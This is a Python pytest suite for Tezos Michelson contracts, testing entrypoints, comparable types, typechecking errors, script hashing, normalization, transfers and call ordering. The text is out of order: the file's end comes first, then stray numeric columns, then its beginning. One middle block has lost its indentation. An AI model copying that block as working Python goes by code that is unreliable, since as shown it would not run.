        originate(client, session, path, storage, 0)
        utils.bake(client, 'bootstrap5')
        # call contract: creates the internal contract and calls it.
        client.transfer(
            0,
            'bootstrap1',
            'multiple_entrypoints_counter',
            ['--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        assert client.get_storage('multiple_entrypoints_counter') == 'None', (
            "The storage of the multiple_entrypoints_counter contract"
            " should be None"
        )

    # Test CONTRACT with/without entrypoint annotation on literal address
    # parameters with/without entrypoint annotation
    def test_originate_simple_entrypoints(self, session: dict, client: Client):
        """originates the contract simple_entrypoints.tz
        with entrypoint %A of type unit used in
        test_simple_entrypoints"""
        contract_target = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'simple_entrypoints.tz'
        )
        originate(client, session, contract_target, 'Unit', 0)
        utils.bake(client, 'bootstrap5')

    @pytest.mark.parametrize(
        'contract_annotation, contract_type, param, expected_storage',
        [
            # tests passing adr to CONTRACT %A unit
            # where adr has an entrypoint %A of type unit, is allowed.
            ('%A', 'unit', '"{adr}"', '(Some "{adr}%A")'),
            ('%B', 'string', '"{adr}"', '(Some "{adr}%B")'),
            ('%C', 'nat', '"{adr}"', '(Some "{adr}%C")'),
            # tests passing adr%A to CONTRACT %A unit: redundant specification
            # of entrypoint not allowed so CONTRACT returns None
            ('%A', 'unit', '"{adr}%A"', 'None'),
            ('%A', 'unit', '"{adr}%B"', 'None'),
            ('%A', 'unit', '"{adr}%D"', 'None'),
            # NOTE(review): the next case duplicates the first case of this
            # group three lines above — probably unintended.
            ('%A', 'unit', '"{adr}%A"', 'None'),
            ('%B', 'unit', '"{adr}%A"', 'None'),
            ('%D', 'unit', '"{adr}%A"', 'None'),
            # tests passing adr%A to CONTRACT unit:
            # where adr has an entrypoint %A of type unit, is allowed.
            ('', 'unit', '"{adr}%A"', '(Some "{adr}%A")'),
            ('', 'string', '"{adr}%B"', '(Some "{adr}%B")'),
            ('', 'nat', '"{adr}%C"', '(Some "{adr}%C")'),
            # tests passing adr%B to CONTRACT unit:
            # as entrypoint %B of simple_entrypoints.tz has type string,
            # CONTRACT will return None.
            ('', 'unit', '"{adr}%B"', 'None'),
            # tests passing adr%D to CONTRACT unit:
            # as entrypoint %D does not exist in simple_entrypoints.tz,
            # CONTRACT will return None.
            ('', 'unit', '"{adr}%D"', 'None'),
            # tests passing adr to CONTRACT unit:
            # as adr does not have type unit, CONTRACT returns None.
            ('', 'unit', '"{adr}"', 'None'),
            # entrypoint that does not exist
            ('%D', 'unit', '"{adr}"', 'None'),
            # ill-typed entrypoints
            ('%A', 'int', '"{adr}"', 'None'),
            ('%B', 'unit', '"{adr}"', 'None'),
            ('%C', 'int', '"{adr}"', 'None'),
        ],
    )
    def test_simple_entrypoints(
        self,
        session,
        client,
        contract_annotation,
        contract_type,
        param,
        expected_storage,
    ):
        """Run an ad-hoc CONTRACT script against the previously originated
        simple_entrypoints contract and check the resulting option."""
        contract = f'''parameter address;
          storage (option address);
          code {{
            CAR;
            CONTRACT {contract_annotation} {contract_type};
            IF_SOME {{ ADDRESS; SOME }} {{ NONE address; }};
            NIL operation;
            PAIR
          }};'''
        param = param.format(adr=session['contract'])
        expected_storage = expected_storage.format(adr=session['contract'])
        run_script_res = client.run_script(contract, 'None', param, file=False)
        assert run_script_res.storage == expected_storage
@pytest.mark.contract
class TestComparables:
    """Tests of which types are comparable (usable as set elements and
    map/big_map keys) and of the required ordering of literals."""

    def test_comparable_unit(self, client):
        """unit is comparable."""
        client.typecheck_data('{}', '(set unit)')
        client.typecheck_data('{Unit}', '(set unit)')

    def test_comparable_options(self, client):
        """option over a comparable type is comparable; None < Some _."""
        client.typecheck_data('{}', '(set (option nat))')
        client.typecheck_data('{None; Some 1; Some 2}', '(set (option int))')
        utils.assert_typecheck_data_failure(
            client, '{Some "foo"; Some "bar"}', '(set (option string))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Some Unit; None}', '(set (option unit))'
        )

    def test_comparable_unions(self, client):
        """or over comparable types is comparable; Left _ < Right _."""
        client.typecheck_data('{}', '(set (or unit bool))')
        client.typecheck_data(
            '{Left 3; Left 4; Right "bar"; Right "foo"}',
            '(set (or nat string))',
        )
        utils.assert_typecheck_data_failure(
            client, '{Left 2; Left 1}', '(set (or mutez unit))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Right True; Right False}', '(set (or unit bool))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Right 0; Left 1}', '(set (or nat nat))'
        )

    def test_comparable_pair(self, client: Client):
        # tests that comb pairs are comparable and that the order is the
        # expected one
        client.typecheck_data('{}', '(set (pair nat string))')
        client.typecheck_data('{Pair 0 "foo"}', '(set (pair nat string))')
        client.typecheck_data(
            '{Pair 0 "foo"; Pair 1 "bar"}', '(set (pair nat string))'
        )
        client.typecheck_data(
            '{Pair 0 "bar"; Pair 0 "foo"; \
             Pair 1 "bar"; Pair 1 "foo"}',
            '(set (pair nat string))',
        )
        client.typecheck_data('{}', '(set (pair nat (pair string bytes)))')
        client.typecheck_data('{}', '(map (pair nat string) unit)')
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit}', '(map (pair nat string) unit)'
        )
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit; \
             Elt (Pair 1 "bar") Unit}',
            '(map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{Elt (Pair 0 "bar") Unit; \
             Elt (Pair 0 "foo") Unit; \
             Elt (Pair 1 "bar") Unit; \
             Elt (Pair 1 "foo") Unit}',
            '(map (pair nat string) unit)',
        )
        client.typecheck_data('{}', '(map (pair nat (pair string bytes)) unit)')
        client.typecheck_data('{}', '(big_map (pair nat string) unit)')
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit}', '(big_map (pair nat string) unit)'
        )
        client.typecheck_data(
            '{Elt (Pair 0 "foo") Unit; \
             Elt (Pair 1 "bar") Unit}',
            '(big_map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{Elt (Pair 0 "bar") Unit; \
             Elt (Pair 0 "foo") Unit; \
             Elt (Pair 1 "bar") Unit; \
             Elt (Pair 1 "foo") Unit}',
            '(big_map (pair nat string) unit)',
        )
        client.typecheck_data(
            '{}', '(big_map (pair nat (pair string bytes)) unit)'
        )
        client.typecheck_data('{}', '(set (pair (pair nat nat) nat))')
        client.typecheck_data(
            '{}',
            '(set (pair (pair int nat) \
                        (pair bool bytes)))',
        )

    def test_order_of_pairs(self, client: Client):
        # tests that badly-ordered set literals are rejected
        utils.assert_typecheck_data_failure(
            client, '{Pair 0 "foo"; Pair 0 "bar"}', '(set (pair nat string))'
        )
        utils.assert_typecheck_data_failure(
            client, '{Pair 1 "bar"; Pair 0 "foo"}', '(set (pair nat string))'
        )

    def test_comparable_chain_id(self, client):
        """chain_id is comparable; literals must be in ascending order."""
        client.typecheck_data('{}', '(set chain_id)')
        chain1 = client.rpc('get', 'chains/main/chain_id')
        chain2 = 'NetXZVhNXbDTx5M'
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{chain1}' + '"; "' + f'{chain2}' + '"}',
            '(set chain_id)',
        )
        client.typecheck_data(
            '{"' + f'{chain2}' + '"; "' + f'{chain1}' + '"}', '(set chain_id)'
        )

    def test_comparable_signature(self, client):
        """signature is comparable; literals must be in ascending order."""
        client.typecheck_data('{}', '(set signature)')
        packed = client.pack('Unit', 'unit')
        sig1 = client.sign_bytes_of_string(packed, "bootstrap1")
        sig2 = client.sign_bytes_of_string(packed, "bootstrap2")
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{sig1}' + '"; "' + f'{sig2}' + '"}',
            '(set signature)',
        )
        client.typecheck_data(
            '{"' + f'{sig2}' + '"; "' + f'{sig1}' + '"}', '(set signature)'
        )

    def test_comparable_key(self, client):
        """key is comparable; literals must be in ascending order."""
        pubkey1 = IDENTITIES['bootstrap1']['public']
        pubkey2 = IDENTITIES['bootstrap2']['public']
        client.typecheck_data('{}', '(set key)')
        utils.assert_typecheck_data_failure(
            client,
            '{"' + f'{pubkey1}' + '"; "' + f'{pubkey2}' + '"}',
            '(set key)',
        )
        client.typecheck_data(
            '{"' + f'{pubkey2}' + '"; "' + f'{pubkey1}' + '"}', '(set key)'
        )

    def test_comparable_key_different_schemes(self, client):
        """Keys of different signature schemes compare in the order
        ed25519 < secp256k1 < p256."""
        client.gen_key('sk1', ['--sig', 'ed25519'])
        key1 = client.show_address('sk1').public_key
        client.gen_key('sk2', ['--sig', 'secp256k1'])
        key2 = client.show_address('sk2').public_key
        client.gen_key('sk3', ['--sig', 'p256'])
        key3 = client.show_address('sk3').public_key
        # Three public keys of the three different signature schemes, ordered
        client.typecheck_data(
            '{"' + key1 + '"; "' + key2 + '"; "' + key3 + '"}', '(set key)'
        )
        # Test all orderings that do not respect the comparable order
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key1 + '"; "' + key3 + '"; "' + key2 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key2 + '"; "' + key1 + '"; "' + key3 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key2 + '"; "' + key3 + '"; "' + key1 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key3 + '"; "' + key1 + '"; "' + key2 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key3 + '"; "' + key2 + '"; "' + key1 + '"}',
            '(set key)',
        )
@pytest.mark.contract
class TestTypecheckingErrors:
    """Checks the typechecker's error reporting on ill-typed scripts."""

    def test_big_map_arity_error(self, client: Client):
        """Typechecking EMPTY_BIG_MAP applied to a single type argument
        must be reported as an arity error."""
        script = os.path.join(CONTRACT_PATH, 'ill_typed', 'big_map_arity.tz')
        expected = 'primitive EMPTY_BIG_MAP expects 2 arguments but is given 1.'
        with utils.assert_run_failure(expected):
            client.typecheck(script)
# Contract used by TestBadAnnotation below: it UNPACKs its bytes
# parameter as a lambda and stores the resulting option; bytes carrying
# an invalid annotation are expected to unpack to None.
BAD_ANNOT_TEST = '''
parameter bytes;
storage (option (lambda unit unit));
code { CAR; UNPACK (lambda unit unit); NIL operation; PAIR}
'''
@pytest.mark.contract
class TestBadAnnotation:
    """UNPACK of bytes carrying a malformed annotation must yield None."""

    def test_write_contract_bad_annot(self, tmpdir, session: dict):
        """Write the BAD_ANNOT_TEST script to disk and record its path."""
        name = 'bad_annot.tz'
        contract = f'{tmpdir}/{name}'
        script = BAD_ANNOT_TEST
        with open(contract, 'w') as contract_file:
            contract_file.write(script)
        session[name] = contract

    def test_bad_annotation(self, client: Client, session: dict):
        """Run the contract on packed bytes whose annotation is not valid
        UTF-8; UNPACK must return None rather than fail."""
        name = 'bad_annot.tz'
        contract = session[name]
        # This was produced by running "tezos-client hash data '{ UNIT
        # ; PAIR ; CAR %faa }' of type 'lambda unit unit'" and
        # replacing the two last bytes (that correspond to the two
        # 'a's at the end of the annotation) by the 0xff byte which is
        # not a valid UTF8-encoding of a string
        parameter = '0x05020000000e034f03420416000000042566ffff'
        res = client.run_script(contract, 'None', parameter)
        assert res.storage == 'None'
@pytest.mark.contract
class TestOrderInTopLevelDoesNotMatter:
    """The top-level sections of a script may appear in any order."""

    @pytest.fixture
    def contract_splitted_in_top_level_elements(self):
        """A minimal contract split into its three top-level sections."""
        sections = [
            "parameter nat",
            "storage unit",
            "code { CDR; NIL operation; PAIR }",
        ]
        return sections

    def test_shuffle(
        self, client: Client, contract_splitted_in_top_level_elements
    ):
        """
        Test that the storage, code, and parameter sections can appear in any
        order in a contract script.
        """
        sections = contract_splitted_in_top_level_elements
        # Every permutation of the three sections must typecheck.
        for ordering in itertools.permutations(sections):
            script = ";\n".join(ordering)
            client.typecheck(script, file=False)
@pytest.mark.contract
@pytest.mark.regression
class TestSelfAddressTransfer:
    """SELF_ADDRESS produced by one contract and consumed by another."""

    def test_self_address_originate_sender(
        self, client_regtest_scrubbed, session
    ):
        """Originate the sender contract."""
        client = client_regtest_scrubbed
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'self_address_sender.tz'
        )
        originate(client, session, path, 'Unit', 0)

    def test_self_address_originate_receiver(
        self, client_regtest_scrubbed, session
    ):
        """Originate the receiver contract and remember its address."""
        client = client_regtest_scrubbed
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'self_address_receiver.tz'
        )
        originate(client, session, path, 'Unit', 0)
        session['receiver_address'] = session['contract']

    def test_send_self_address(self, client_regtest_scrubbed, session):
        """Have the sender contract send its SELF_ADDRESS to the receiver."""
        client = client_regtest_scrubbed
        receiver_address = session['receiver_address']
        client.transfer(
            0,
            'bootstrap2',
            'self_address_sender',
            ['--arg', f'"{receiver_address}"', '--burn-cap', '2'],
        )
        utils.bake(client, 'bootstrap5')
@pytest.mark.slow
@pytest.mark.contract
@pytest.mark.regression
class TestScriptHashRegression:
    """Regression test hashing every contract script of the test suite."""

    @pytest.mark.parametrize("contract", all_contracts())
    def test_contract_hash(self, client_regtest: Client, contract):
        """Hash each contract script; output is checked by the regtest
        machinery against the recorded expected output."""
        client = client_regtest
        assert contract.endswith(
            '.tz'
        ), "test contract should have .tz extension"
        client.hash_script(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.contract
class TestScriptHashOrigination:
    """Hashing a script literal agrees with hashing it after origination."""

    def test_contract_hash_with_origination(
        self, client: Client, session: dict
    ):
        """Originate a trivial contract and check that the hash of the
        source literal equals the hash of the originated script."""
        script = 'parameter unit; storage unit; code {CAR; NIL operation; PAIR}'
        originate(
            client,
            session,
            contract=script,
            init_storage='Unit',
            amount=1000,
            contract_name='dummy_contract',
        )
        local_hash = client.hash_script(script)
        onchain_hash = client.get_script_hash('dummy_contract')
        assert local_hash == onchain_hash
@pytest.mark.contract
@pytest.mark.regression
class TestNormalize:
    """Regression tests for the "normalize data" command."""

    # Unparsing modes accepted by the normalize commands; None means the
    # client's default mode.
    modes = [None, 'Readable', 'Optimized', 'Optimized_legacy']

    @pytest.mark.parametrize('mode', modes)
    def test_normalize_unparsing_mode(self, client_regtest_scrubbed, mode):
        """Normalize comb-pair data in every unparsing mode."""
        client = client_regtest_scrubbed
        input_data = (
            '{Pair 0 3 6 9; Pair 1 (Pair 4 (Pair 7 10)); {2; 5; 8; 11}}'
        )
        input_type = 'list (pair nat nat nat nat)'
        client.normalize(input_data, input_type, mode=mode)

    def test_normalize_legacy_flag(self, client_regtest_scrubbed):
        """The legacy flag tolerates an annotation that is otherwise
        rejected as unexpected."""
        client = client_regtest_scrubbed
        input_data = '{Elt %a 0 1}'
        input_type = 'map nat nat'
        client.normalize(input_data, input_type, legacy=True)
        error_pattern = 'unexpected annotation.'
        with utils.assert_run_failure(error_pattern):
            client.normalize(input_data, input_type, legacy=False)

    @pytest.mark.parametrize('mode', modes)
    def test_normalize_script(self, client_regtest_scrubbed, mode):
        """Normalize a whole script in every unparsing mode."""
        client = client_regtest_scrubbed
        path = os.path.join(CONTRACT_PATH, 'opcodes', 'comb-literals.tz')
        client.normalize_script(path, mode=mode)

    # Types normalized by test_normalize_type, including comb pairs.
    types = [
        'nat',
        'list nat',
        'pair nat int',
        'list (pair nat int)',
        'pair nat int bool',
        'list (pair nat int bool)',
        'pair nat int bool bytes',
        'list (pair nat int bool bytes)',
    ]

    @pytest.mark.parametrize('typ', types)
    def test_normalize_type(self, client_regtest_scrubbed, typ):
        """Normalize each type; output is checked by the regtest machinery."""
        client = client_regtest_scrubbed
        client.normalize_type(typ)
| 36.746164 | 80 | 0.58071 | import os
import re
import json
import itertools
from typing import List, Union, Any
import pytest
from client.client import Client
from tools import utils
from tools.constants import IDENTITIES
from .contract_paths import (
CONTRACT_PATH,
ILLTYPED_CONTRACT_PATH,
all_contracts,
all_legacy_contracts,
)
def file_basename(path):
return os.path.splitext(os.path.basename(path))[0]
def originate(
client,
session,
contract,
init_storage,
amount,
contract_name=None,
sender='bootstrap1',
baker='bootstrap5',
arguments=None,
):
if contract_name is None:
contract_name = file_basename(contract)
args = ['--init', init_storage, '--burn-cap', '10.0']
if arguments is not None:
args += arguments
origination = client.originate(
contract_name, amount, sender, contract, args
)
session['contract'] = origination.contract
print(origination.contract)
utils.bake(client, baker)
assert utils.check_block_contains_operations(
client, [origination.operation_hash]
)
return origination
@pytest.mark.contract
@pytest.mark.incremental
class TestManager:
def test_manager_origination(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'manager.tz')
pubkey = IDENTITIES['bootstrap2']['identity']
originate(client, session, path, f'"{pubkey}"', 1000)
originate(
client, session, path, f'"{pubkey}"', 1000, contract_name="manager2"
)
def test_delegatable_origination(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'delegatable_target.tz'
)
pubkey = IDENTITIES['bootstrap2']['identity']
originate(
client, session, path, f'Pair "{pubkey}" (Pair "hello" 45)', 1000
)
def test_target_with_entrypoints_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'big_map_entrypoints.tz'
)
originate(
client, session, path, 'Pair {} {}', 1000, contract_name='target'
)
def test_target_without_entrypoints_origination(
self, client: Client, session
):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_entrypoint_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_entrypoints',
)
def test_target_without_default_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_default_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_default',
)
def test_target_with_root_origination(self, client: Client, session):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'rooted_target.tz')
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='rooted_target',
)
def test_manager_set_delegate(self, client: Client):
client.set_delegate('manager', 'bootstrap2', [])
utils.bake(client, 'bootstrap5')
bootstrap2_pkh = IDENTITIES['bootstrap2']['identity']
client.set_delegate('delegatable_target', bootstrap2_pkh, [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap2']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
client.set_delegate('manager', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
client.set_delegate('delegatable_target', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap3']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
def test_manager_withdraw_delegate(self, client: Client):
client.withdraw_delegate('manager', [])
utils.bake(client, 'bootstrap5')
client.withdraw_delegate('delegatable_target', [])
utils.bake(client, 'bootstrap5')
assert client.get_delegate('manager', []).delegate is None
assert client.get_delegate('delegatable_target', []).delegate is None
def test_transfer_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.001
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'bootstrap2',
'manager',
['--gas-limit', f'{128 * 15450 + 108}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000548
fee_mutez = utils.mutez_of_tez(fee)
assert balance + amount_mutez == new_balance
assert (
balance_bootstrap - fee_mutez - amount_mutez
== new_balance_bootstrap
)
def test_simple_transfer_from_manager_to_implicit(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.1
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'bootstrap2',
['--gas-limit', f'{128 * 26350 + 12}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000794
fee_mutez = utils.mutez_of_tez(fee)
assert balance - amount_mutez == new_balance
assert (
balance_bootstrap + amount_mutez - fee_mutez
== new_balance_bootstrap
)
def test_transfer_from_manager_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_dest = client.get_mutez_balance('manager2')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'manager2',
['--gas-limit', f'{128 * 44950 + 112}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_dest = client.get_mutez_balance('manager2')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.001124
fee_mutez = utils.mutez_of_tez(fee)
assert balance_bootstrap - fee_mutez == new_balance_bootstrap
assert balance - amount_mutez == new_balance
assert balance_dest + amount_mutez == new_balance_dest
def test_transfer_from_manager_to_default(self, client: Client):
client.transfer(
10, 'manager', 'bootstrap2', ['--entrypoint', 'default']
)
utils.bake(client, 'bootstrap5')
client.transfer(10, 'manager', 'manager', ['--entrypoint', 'default'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_target(self, client: Client):
client.transfer(10, 'manager', 'target', ['--burn-cap', '0.356'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_entrypoint_with_args(
self, client: Client
):
arg = 'Pair "hello" 42'
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_no_entrypoint_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(0, 'manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
client.call('manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_no_default_with_args(
    self, client: Client
):
    """Pass an argument to a contract without a %default entrypoint,
    via both `transfer` and `call`."""
    arg_options = ['--arg', 'Left Unit']
    client.transfer(0, 'manager', 'target_no_default', arg_options)
    utils.bake(client, 'bootstrap5')
    client.call('manager', 'target_no_default', arg_options)
    utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_rooted_target_with_args(
    self, client: Client
):
    """Invoke the %root entrypoint of the rooted target contract via
    both `transfer` and `call`."""
    root_args = ['--arg', 'Left Unit', '--entrypoint', 'root']
    client.transfer(0, 'manager', 'rooted_target', root_args)
    utils.bake(client, 'bootstrap5')
    client.call('manager', 'rooted_target', root_args)
    utils.bake(client, 'bootstrap5')
def test_transfer_json_to_entrypoint_with_args(self, client: Client):
    """Inject a JSON-encoded batch calling the target's %add_left
    entrypoint and check that only the fee moved.

    The transferred amount is 0, so the manager contract's balance is
    unchanged; the fee is debited from 'bootstrap2' (the key injecting
    the batch on the manager's behalf).
    """
    balance = client.get_mutez_balance('manager')
    balance_bootstrap = client.get_mutez_balance('bootstrap2')
    fee = 0.0123  # tez; must match the "fee" field in the JSON below
    fee_mutez = utils.mutez_of_tez(fee)
    json_obj = [
        {
            "destination": "target",
            "amount": "0",
            "fee": str(fee),
            "gas-limit": "65942",
            "storage-limit": "1024",
            "arg": 'Pair "hello" 42',
            "entrypoint": "add_left",
        }
    ]
    # Compact separators: the client expects the operation list as a
    # single JSON argument.
    json_ops = json.dumps(json_obj, separators=(',', ':'))
    client.run(client.cmd_batch('manager', json_ops))
    utils.bake(client, 'bootstrap5')
    new_balance = client.get_mutez_balance('manager')
    new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
    # Zero-amount call: manager untouched, bootstrap2 pays only the fee.
    assert balance == new_balance
    assert balance_bootstrap - fee_mutez == new_balance_bootstrap
def test_multiple_transfers(self, client: Client):
    """Batch two transfers from 'manager' (to bootstrap2 and bootstrap3)
    in one JSON multi-operation and check the resulting balances."""
    balance = client.get_mutez_balance('manager')
    balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
    balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
    amount_2 = 10.1
    amount_mutez_2 = utils.mutez_of_tez(amount_2)
    amount_3 = 11.01
    amount_mutez_3 = utils.mutez_of_tez(amount_3)
    json_obj = [
        {"destination": "bootstrap2", "amount": str(amount_2)},
        {"destination": "bootstrap3", "amount": str(amount_3)},
    ]
    json_ops = json.dumps(json_obj, separators=(',', ':'))
    client.run(client.cmd_batch('manager', json_ops))
    utils.bake(client, 'bootstrap5')
    new_balance = client.get_mutez_balance('manager')
    new_balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
    new_balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
    # Hard-coded mutez fees of the two batched operations.
    # NOTE(review): the fee is subtracted from bootstrap2's expected
    # balance below — presumably bootstrap2 pays both operations' fees
    # as the batch injector; confirm against the client's batch
    # semantics if these constants ever change.
    fee_mutez = 794 + 698
    assert balance - amount_mutez_2 - amount_mutez_3 == new_balance
    assert (
        balance_bootstrap2 + amount_mutez_2 - fee_mutez
        == new_balance_bootstrap2
    )
    assert balance_bootstrap3 + amount_mutez_3 == new_balance_bootstrap3
# With depth-first (DFS) execution, the storer ends up containing "ABC".
@pytest.mark.contract
@pytest.mark.incremental
class TestExecutionOrdering:
    """Checks the execution order of inter-contract calls.

    A tree of 'caller' contracts fans out to 'appender' contracts; each
    appender appends one letter to a shared 'storer' contract, so the
    final storage spells out the order in which calls were executed.
    """

    STORER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_storer.tz'
    CALLER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_caller.tz'
    APPENDER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_appender.tz'

    def originate_storer(self, client: Client, session: dict):
        """Deploy the storer contract with an empty-string storage."""
        result = originate(
            client, session, self.STORER, '""', 0, arguments=['--force']
        )
        session['storer'] = result.contract
        utils.bake(client, 'bootstrap3')
        return result.contract

    def originate_appender(
        self, client: Client, session: dict, storer: str, argument: str
    ):
        """Deploy an appender that writes `argument` into `storer`."""
        result = originate(
            client,
            session,
            self.APPENDER,
            f'Pair "{storer}" "{argument}"',
            0,
            contract_name=f'appender-{argument}',
            arguments=['--force'],
        )
        session[f'appender.{argument}'] = result.contract
        utils.bake(client, 'bootstrap3')
        return result.contract

    def originate_caller(
        self, client: Client, session: dict, callees: List[str]
    ):
        """Deploy a caller whose storage lists the callee addresses."""
        quoted = ['"{}"'.format(callee) for callee in callees]
        storage = "{" + '; '.join(quoted) + "}"
        result = originate(
            client,
            session,
            self.CALLER,
            storage,
            0,
            contract_name=f'caller-{hash(storage)}',
        )
        utils.bake(client, 'bootstrap3')
        return result.contract

    @pytest.mark.parametrize(
        "tree, expected",
        [
            # before 009, the result should be "DABCEFG".
            ([["A", "B", "C"], "D", ["E", "F", "G"]], "ABCDEFG"),
            # before 009, the result should be "ACB".
            ([["A", ["B"], "C"]], "ABC"),
            # before 009, the result should be "ABDC".
            ([["A", ["B", ["C"], "D"]]], "ABCD"),
            ([], ""),
        ],
    )
    def test_ordering(
        self,
        client: Client,
        session: dict,
        # approximation of a recursive type annotation
        tree: Union[str, List[Any]],
        expected: str,
    ):
        """Deploy the call tree, trigger its root, and compare the
        storer's final storage with the expected letter sequence."""
        storer = self.originate_storer(client, session)

        def deploy(node: Union[str, List[Any]]) -> str:
            # A string leaf becomes an appender; a list becomes a caller
            # over its recursively deployed children (left to right).
            if isinstance(node, str):
                return self.originate_appender(client, session, storer, node)
            return self.originate_caller(
                client, session, [deploy(child) for child in node]
            )

        root = deploy(tree)
        client.transfer(
            0,
            'bootstrap2',
            root,
            ["--burn-cap", "5"],
        )
        utils.bake(client, 'bootstrap3')
        assert client.get_storage(storer) == '"{}"'.format(expected)
@pytest.mark.slow
@pytest.mark.contract
class TestContracts:
    """Typechecking of the whole contract corpus: well-typed contracts,
    deprecated legacy contracts, and ill-typed contracts with their
    expected error messages."""

    @pytest.mark.parametrize("contract", all_contracts())
    def test_typecheck(self, client: Client, contract):
        """Every contract in the corpus must typecheck."""
        assert contract.endswith(
            '.tz'
        ), "test contract should have .tz extension"
        client.typecheck(os.path.join(CONTRACT_PATH, contract))

    @pytest.mark.parametrize("contract", all_legacy_contracts())
    def test_deprecated_typecheck_breaks(self, client, contract):
        """Legacy contracts are rejected in default (non-legacy) mode."""
        # The create_contract variants fail with a typing error before
        # the deprecation check is reached; the others fail on the
        # deprecated-instruction check itself.
        if contract in [
            "legacy/create_contract.tz",
            "legacy/create_contract_flags.tz",
            "legacy/create_contract_rootname.tz",
        ]:
            with utils.assert_run_failure(r'ill-typed script'):
                client.typecheck(os.path.join(CONTRACT_PATH, contract))
        else:
            with utils.assert_run_failure(r'Use of deprecated instruction'):
                client.typecheck(os.path.join(CONTRACT_PATH, contract))

    @pytest.mark.parametrize("contract", all_legacy_contracts())
    def test_deprecated_typecheck_in_legacy(self, client, contract):
        """Legacy contracts are rejected even with the --legacy flag.

        NOTE(review): despite the name, a failure is asserted here too —
        presumably these instructions were removed outright rather than
        merely deprecated; confirm against the protocol changelog.
        """
        if contract in [
            "legacy/create_contract.tz",
            "legacy/create_contract_flags.tz",
            "legacy/create_contract_rootname.tz",
        ]:
            with utils.assert_run_failure(r'ill-typed script'):
                client.typecheck(
                    os.path.join(CONTRACT_PATH, contract), legacy=True
                )
        else:
            with utils.assert_run_failure(r'Use of deprecated instruction'):
                client.typecheck(
                    os.path.join(CONTRACT_PATH, contract), legacy=True
                )

    @pytest.mark.parametrize(
        "contract,error_pattern",
